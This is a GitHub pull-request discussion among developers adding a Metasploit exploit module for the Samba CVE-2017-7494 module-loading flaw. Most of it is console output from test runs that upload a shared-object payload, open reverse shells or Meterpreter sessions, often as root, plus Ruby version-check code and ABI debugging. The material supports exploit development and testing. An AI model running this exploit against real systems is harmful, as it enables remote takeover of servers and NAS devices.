First crack at Samba CVE-2017-7494 #8450

Merged
merged 9 commits into from May 25, 2017

Conversation

Projects
None yet
@hdm
Contributor

hdm commented May 25, 2017

This PR contains a module for the Samba arbitrary module loading vulnerability. It also includes support for x86 and ARMLE elf-so template formats. This has been extensively tested against an up to date Synology NAS and an Ubuntu 16.04 LTS x86_64 image. It needs testing against Linux ARMLE and Linux x86.

The default target is currently set to 2 (x86_64). Make sure to change this when testing other platforms.

Synology:

msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.0.3:4444 
[*] 192.168.0.41:445 - Using location \\192.168.0.41\Temp\ for the path
[*] 192.168.0.41:445 - Payload is stored in //192.168.0.41/Temp/ as OofdIcVi.so
[*] 192.168.0.41:445 - Trying location /volume1/OofdIcVi.so...
[*] 192.168.0.41:445 - Trying location /volume1/Temp/OofdIcVi.so...
[*] Command shell session 2 opened (192.168.0.3:4444 -> 192.168.0.41:41100) at 2017-05-24 19:40:33 -0500

id
uid=0(root) gid=0(root) groups=0(root),100(users)

Ubuntu 16.04:

msf exploit(is_known_pipename) > exploit 

[*] Started reverse TCP handler on 192.168.0.3:4444 
[*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path
[*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so
[*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...
[*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500

id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

The stuff left on my TODO for this (via additional PR if needed):

  • Look into other ways to exploit this without knowing the server-side path (/proc/self/cwd, etc)
  • Fingerprint specific OS configurations via blocking on FIFO pipe reads
  • Additional support for other architectures

It would be really neat if this could just cycle all possible architectures once it figured out a writeable path. If the module has trouble finding a writable path, you can specify it manually via SMB_SHARE_NAME, SMB_FOLDER, and SMB_SHARE_BASE.

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 May 25, 2017

Contributor

Coincidentally, I think this resolves #7723. Double win.

Contributor

wvu-r7 commented May 25, 2017

Coincidentally, I think this resolves #7723. Double win.

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb May 25, 2017

Contributor

Nice, thanks for fixing the .so templates!

Contributor

busterb commented May 25, 2017

Nice, thanks for fixing the .so templates!

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die May 25, 2017

Contributor

Synology DS412+ w/ INTEL Atom D2700 on DSM 6.1.1-15101 Update 2 (update 3 is current, will test that in a minute)

msf exploit(is_known_pipename) > exploit

[*] Started reverse TCP handler on 1.2.3.117:4444 
[*] 1.2.3.119:445 - Using location \\1.2.3.119\ESX\ for the path
[*] 1.2.3.119:445 - Payload is stored in //1.2.3.119/ESX/ as eePUbtdw.so
[*] 1.2.3.119:445 - Trying location /volume1/eePUbtdw.so...
[-] 1.2.3.119:445 - Probe: /volume1/eePUbtdw.so: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] 1.2.3.119:445 - Trying location /volume1/ESX/eePUbtdw.so...
[*] Command shell session 1 opened (1.2.3.117:4444 -> 1.2.3.119:34366) at 2017-05-24 21:12:07 -0400

id
uid=0(root) gid=0(root) groups=0(root),100(users)
uname -a
Linux synologyNAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_412+
Contributor

h00die commented May 25, 2017

Synology DS412+ w/ INTEL Atom D2700 on DSM 6.1.1-15101 Update 2 (update 3 is current, will test that in a minute)

msf exploit(is_known_pipename) > exploit

[*] Started reverse TCP handler on 1.2.3.117:4444 
[*] 1.2.3.119:445 - Using location \\1.2.3.119\ESX\ for the path
[*] 1.2.3.119:445 - Payload is stored in //1.2.3.119/ESX/ as eePUbtdw.so
[*] 1.2.3.119:445 - Trying location /volume1/eePUbtdw.so...
[-] 1.2.3.119:445 - Probe: /volume1/eePUbtdw.so: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] 1.2.3.119:445 - Trying location /volume1/ESX/eePUbtdw.so...
[*] Command shell session 1 opened (1.2.3.117:4444 -> 1.2.3.119:34366) at 2017-05-24 21:12:07 -0400

id
uid=0(root) gid=0(root) groups=0(root),100(users)
uname -a
Linux synologyNAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_412+
@OJ

This comment has been minimized.

Show comment
Hide comment
@OJ

OJ May 25, 2017

Contributor

Scarily consistent output at my end too:

msf exploit(is_known_pipename) > run

[*] [2017.05.25-11:23:53] Started reverse TCP handler on <nope>:5555 
[*] [2017.05.25-11:23:54] <nope>:445 - Using location \\<nope>\<nope>\ for the path
[*] [2017.05.25-11:23:54] <nope>:445 - Payload is stored in //<nope>/<nope>/ as WDRFSUkE.so
[*] [2017.05.25-11:23:54] <nope>:445 - Trying location /volume1/WDRFSUkE.so...
[*] [2017.05.25-11:23:54] <nope>:445 - Trying location /volume1/<nope>/WDRFSUkE.so...
[*] Command shell session 2 opened (<nope>:5555 -> <nope>:40206) at 2017-05-25 11:23:54 +1000

id
uid=0(root) gid=0(root) groups=0(root),100(users)
uname -a
Linux NAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_1512+

👍

The module leaves the .so files behind on disk, I assume that cleanup isn't something that can happen until the session has finished, right?

Contributor

OJ commented May 25, 2017

Scarily consistent output at my end too:

msf exploit(is_known_pipename) > run

[*] [2017.05.25-11:23:53] Started reverse TCP handler on <nope>:5555 
[*] [2017.05.25-11:23:54] <nope>:445 - Using location \\<nope>\<nope>\ for the path
[*] [2017.05.25-11:23:54] <nope>:445 - Payload is stored in //<nope>/<nope>/ as WDRFSUkE.so
[*] [2017.05.25-11:23:54] <nope>:445 - Trying location /volume1/WDRFSUkE.so...
[*] [2017.05.25-11:23:54] <nope>:445 - Trying location /volume1/<nope>/WDRFSUkE.so...
[*] Command shell session 2 opened (<nope>:5555 -> <nope>:40206) at 2017-05-25 11:23:54 +1000

id
uid=0(root) gid=0(root) groups=0(root),100(users)
uname -a
Linux NAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_1512+

👍

The module leaves the .so files behind on disk, I assume that cleanup isn't something that can happen until the session has finished, right?

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die May 25, 2017

Contributor

same result after going fully up to date on mine (update 3).
I'll stab out some docs in a few min just so we're on the same page on whats been tested and confirmed and what hasn't

samba version 4.4.9 for the record

Contributor

h00die commented May 25, 2017

same result after going fully up to date on mine (update 3).
I'll stab out some docs in a few min just so we're on the same page on whats been tested and confirmed and what hasn't

samba version 4.4.9 for the record

@wwebb-r7

This comment has been minimized.

Show comment
Hide comment
@wwebb-r7

wwebb-r7 May 25, 2017

Contributor

No dice on armle based WD glorified-external-drive NAS. The module itself works just fine at first glance

sorry, my hostname is not very gh friendly

---:/shares/research# file /usr/sbin/samba_multicall 
/usr/sbin/samba_multicall: ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.31, BuildID[sha1]=0x2f0327768cf7edf270387fdb1380fcd64e99b666, not stripped
---:/shares/research# file eRoaKgKM.so 
eRoaKgKM.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped
---:/shares/research# uname -a
Linux --- 3.2.26 #1 SMP Thu Jul 9 11:14:15 PDT 2015 wd-2.4-rel armv7l GNU/Linux
---:/shares/research# 

I have some more armle devices I can test later and actually debug it without going through an act of congress. Probably won't get around to that until tomorrow evening at best.

Contributor

wwebb-r7 commented May 25, 2017

No dice on armle based WD glorified-external-drive NAS. The module itself works just fine at first glance

sorry, my hostname is not very gh friendly

---:/shares/research# file /usr/sbin/samba_multicall 
/usr/sbin/samba_multicall: ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.31, BuildID[sha1]=0x2f0327768cf7edf270387fdb1380fcd64e99b666, not stripped
---:/shares/research# file eRoaKgKM.so 
eRoaKgKM.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped
---:/shares/research# uname -a
Linux --- 3.2.26 #1 SMP Thu Jul 9 11:14:15 PDT 2015 wd-2.4-rel armv7l GNU/Linux
---:/shares/research# 

I have some more armle devices I can test later and actually debug it without going through an act of congress. Probably won't get around to that until tomorrow evening at best.

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die May 25, 2017

Contributor

module docs: hdm#15
@OJ need to know your DSM version and samba version if its isn't a DSM already listed
@wwebb-r7 what version of samba and what WD NAS OS is that?
@hdm need similar info on version numbers

Contributor

h00die commented May 25, 2017

module docs: hdm#15
@OJ need to know your DSM version and samba version if its isn't a DSM already listed
@wwebb-r7 what version of samba and what WD NAS OS is that?
@hdm need similar info on version numbers

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 May 25, 2017

Contributor

Works right out of the box (no configuration) on Samba 4.1.13 on Ubuntu 15.04 (my exploit dev VM).

msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] 192.168.33.129:445 - Using location \\192.168.33.129\[redacted]\ for the path
[*] 192.168.33.129:445 - Payload is stored in //192.168.33.129/[redacted]/ as ITmrMclX.so
[*] 192.168.33.129:445 - Trying location /volume1/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /home/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /home/[redacted]/ITmrMclX.so...
[*] Sending stage (2849784 bytes) to 192.168.33.129
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:56646) at 2017-05-24 21:24:14 -0500

meterpreter > 

I did switch to Meterpreter (Mettle), though. :-)

Contributor

wvu-r7 commented May 25, 2017

Works right out of the box (no configuration) on Samba 4.1.13 on Ubuntu 15.04 (my exploit dev VM).

msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] 192.168.33.129:445 - Using location \\192.168.33.129\[redacted]\ for the path
[*] 192.168.33.129:445 - Payload is stored in //192.168.33.129/[redacted]/ as ITmrMclX.so
[*] 192.168.33.129:445 - Trying location /volume1/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /home/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /home/[redacted]/ITmrMclX.so...
[*] Sending stage (2849784 bytes) to 192.168.33.129
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:56646) at 2017-05-24 21:24:14 -0500

meterpreter > 

I did switch to Meterpreter (Mettle), though. :-)

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 May 25, 2017

Contributor

Just updated!

Contributor

wvu-r7 commented May 25, 2017

Just updated!

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb May 25, 2017

Contributor

Tested template on an Ubuntu 17.04 chroot on an ARMv7 chromebook, similar results to above. Looks like an .so ABI mismatch:

bcook@localhost:/var/opt/bcook$ file /lib/arm-linux-gnueabihf/ld-2.24.so 
/lib/arm-linux-gnueabihf/ld-2.24.so: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked, BuildID[sha1]=8b848f4f76562d20faf06ff375f30318c696fd82, stripped
bcook@localhost:/var/opt/bcook$ file /var/opt/bcook/QCwTHZfa.so 
/var/opt/bcook/QCwTHZfa.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped
bcook@localhost:/var/opt/bcook$ LD_PRELOAD=/var/opt/bcook/QCwTHZfa.so /bin/true
ERROR: ld.so: object '/var/opt/bcook/QCwTHZfa.so' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.

ii samba 2:4.4.5+dfsg-2ubuntu5.5 armhf SMB/CIFS file, print, and login server for Unix

I suspect we need to use EABI for the arm template, which is a lot more common these days than the original OABI spec. Might be nice if metasploit accounted for things like ABI specs, but for now we probably need to just go with most-common denominator.

Contributor

busterb commented May 25, 2017

Tested template on an Ubuntu 17.04 chroot on an ARMv7 chromebook, similar results to above. Looks like an .so ABI mismatch:

bcook@localhost:/var/opt/bcook$ file /lib/arm-linux-gnueabihf/ld-2.24.so 
/lib/arm-linux-gnueabihf/ld-2.24.so: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked, BuildID[sha1]=8b848f4f76562d20faf06ff375f30318c696fd82, stripped
bcook@localhost:/var/opt/bcook$ file /var/opt/bcook/QCwTHZfa.so 
/var/opt/bcook/QCwTHZfa.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped
bcook@localhost:/var/opt/bcook$ LD_PRELOAD=/var/opt/bcook/QCwTHZfa.so /bin/true
ERROR: ld.so: object '/var/opt/bcook/QCwTHZfa.so' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.

ii samba 2:4.4.5+dfsg-2ubuntu5.5 armhf SMB/CIFS file, print, and login server for Unix

I suspect we need to use EABI for the arm template, which is a lot more common these days than the original OABI spec. Might be nice if metasploit accounted for things like ABI specs, but for now we probably need to just go with most-common denominator.

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb May 25, 2017

Contributor

I guess we can consider 'armle' in metasploit equivalent to 'armel' and should be either EABI or OABI (still reading on differences). We could perhaps add an ARCH_ARMHF architecture as well for ARMv7+ EABI support.

https://wiki.embeddedarm.com/wiki/EABI_vs_OABI

Contributor

busterb commented May 25, 2017

I guess we can consider 'armle' in metasploit equivalent to 'armel' and should be either EABI or OABI (still reading on differences). We could perhaps add an ARCH_ARMHF architecture as well for ARMv7+ EABI support.

https://wiki.embeddedarm.com/wiki/EABI_vs_OABI

@wwebb-r7

This comment has been minimized.

Show comment
Hide comment
@wwebb-r7

wwebb-r7 May 25, 2017

Contributor

Without explaining my network topology, I can't check right now. Sorry getting a migraine or something similar.

I don't even have linux on this laptop for more RE tools, but the ARM file trips up IDA as well

illegal

Best effort I've got at the moment

Contributor

wwebb-r7 commented May 25, 2017

Without explaining my network topology, I can't check right now. Sorry getting a migraine or something similar.

I don't even have linux on this laptop for more RE tools, but the ARM file trips up IDA as well

illegal

Best effort I've got at the moment

@wvu-r7 wvu-r7 self-assigned this May 25, 2017

@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk

nixawk May 25, 2017

Contributor

Could we add a method to check vulnerable versions ?

def check
  # vulnerable version match
end

screen shot 2017-05-24 at 23 24 21

Bug Flow

  1. is_known_pipename (./source3/rpc_server/srv_pipe.c)
  2. smb_probe_module (./lib/util/modules.c)
  3. do_smb_load_module (./lib/util/modules.c)
  4. load_module (./lib/util/modules.c)
  5. dlopen
Contributor

nixawk commented May 25, 2017

Could we add a method to check vulnerable versions ?

def check
  # vulnerable version match
end

screen shot 2017-05-24 at 23 24 21

Bug Flow

  1. is_known_pipename (./source3/rpc_server/srv_pipe.c)
  2. smb_probe_module (./lib/util/modules.c)
  3. do_smb_load_module (./lib/util/modules.c)
  4. load_module (./lib/util/modules.c)
  5. dlopen
@bcoles

This comment has been minimized.

Show comment
Hide comment
@bcoles

bcoles May 25, 2017

Contributor

@nixawk I don't see why not. Could also verify OS. Here's some spaghetti code using smb_fingerprint:

def check
    res = smb_fingerprint

    os = res['os']
    vprint_status("Operating System: #{os}")

    if os =~ /Windows/i
      vprint_status('Target operating system not supported')
      return CheckCode::Safe
    end

    smb_version = res['native_lm'].scan(/Samba ([\d\.]+)/).flatten.first
    vprint_status("Samba version: #{smb_version}")

    # 3.x and 4.x branches affected
    if smb_version !~ /^[34]\./
      return CheckCode::Safe
    end

    # 3.x branch - versions prior to 3.5.0 are safe
    if smb_version =~ /^3\.[0-4]\./
      return CheckCode::Safe
    end

    # 4.x branch - patched in 4.4.14 / 4.5.10 / 4.6.4
    if smb_version =~ /^4\./ 
      if smb_version !~ /^4\.([0-3]\.|4\.[0-9]|4\.1[0-3]|5\.[0-9]|6\.[0-3])$/
        return CheckCode::Safe
      end
    end

    connect
    smb_login
    find_writeable_share_path
    disconnect

    if @share.to_s.eql?('')
      vprint_status('Could not find a writeable share')
      return CheckCode::Detected
    else
      vprint_status("Found writeable share: #{@share}")
      return CheckCode::Appears
    end

    CheckCode::Safe
end
Contributor

bcoles commented May 25, 2017

@nixawk I don't see why not. Could also verify OS. Here's some spaghetti code using smb_fingerprint:

def check
    res = smb_fingerprint

    os = res['os']
    vprint_status("Operating System: #{os}")

    if os =~ /Windows/i
      vprint_status('Target operating system not supported')
      return CheckCode::Safe
    end

    smb_version = res['native_lm'].scan(/Samba ([\d\.]+)/).flatten.first
    vprint_status("Samba version: #{smb_version}")

    # 3.x and 4.x branches affected
    if smb_version !~ /^[34]\./
      return CheckCode::Safe
    end

    # 3.x branch - versions prior to 3.5.0 are safe
    if smb_version =~ /^3\.[0-4]\./
      return CheckCode::Safe
    end

    # 4.x branch - patched in 4.4.14 / 4.5.10 / 4.6.4
    if smb_version =~ /^4\./ 
      if smb_version !~ /^4\.([0-3]\.|4\.[0-9]|4\.1[0-3]|5\.[0-9]|6\.[0-3])$/
        return CheckCode::Safe
      end
    end

    connect
    smb_login
    find_writeable_share_path
    disconnect

    if @share.to_s.eql?('')
      vprint_status('Could not find a writeable share')
      return CheckCode::Detected
    else
      vprint_status("Found writeable share: #{@share}")
      return CheckCode::Appears
    end

    CheckCode::Safe
end
@bcoles

This comment has been minimized.

Show comment
Hide comment
@bcoles

bcoles May 25, 2017

Contributor

+1 for not working with ARM. Tested with QNAP NAS.

$ uname -a
Linux --- 3.2.26 #2 SMP Tue May 16 06:17:55 CST 2017 armv7l unknown
$ smb2status
smbd (samba daemon) Version 4.4.9
Contributor

bcoles commented May 25, 2017

+1 for not working with ARM. Tested with QNAP NAS.

$ uname -a
Linux --- 3.2.26 #2 SMP Tue May 16 06:17:55 CST 2017 armv7l unknown
$ smb2status
smbd (samba daemon) Version 4.4.9
@jhart-r7

This comment has been minimized.

Show comment
Hide comment
@jhart-r7

jhart-r7 May 25, 2017

Contributor

@bcoles @nixawk , I've got a WIP commit that should help with the checking part of this. Coincidentally it is similar to @bcoles' POC.

#8452

Contributor

jhart-r7 commented May 25, 2017

@bcoles @nixawk , I've got a WIP commit that should help with the checking part of this. Coincidentally it is similar to @bcoles' POC.

#8452

@Medicean

This comment has been minimized.

Show comment
Hide comment
@Medicean

Medicean May 25, 2017

Works right 👍 👍

msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 192.168.35.197
RHOST => 192.168.35.197
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST           192.168.35.197   yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE                   no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   2   Linux x86_64


msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.35.197:4444
[*] 192.168.35.197:445 - Using location \\192.168.35.197\share\ for the path
[*] 192.168.35.197:445 - Payload is stored in //192.168.35.197/share/ as dDUJiiuf.so
[*] 192.168.35.197:445 - Trying location /volume1/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /tmp/dDUJiiuf.so...
[*] Command shell session 1 opened (192.168.35.197:4444 -> 192.168.35.197:58089) at 2017-05-25 13:26:19 +0800

id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

whoami
nobody

Works right 👍 👍

msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 192.168.35.197
RHOST => 192.168.35.197
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST           192.168.35.197   yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE                   no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   2   Linux x86_64


msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.35.197:4444
[*] 192.168.35.197:445 - Using location \\192.168.35.197\share\ for the path
[*] 192.168.35.197:445 - Payload is stored in //192.168.35.197/share/ as dDUJiiuf.so
[*] 192.168.35.197:445 - Trying location /volume1/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/share/dDUJiiuf.so...
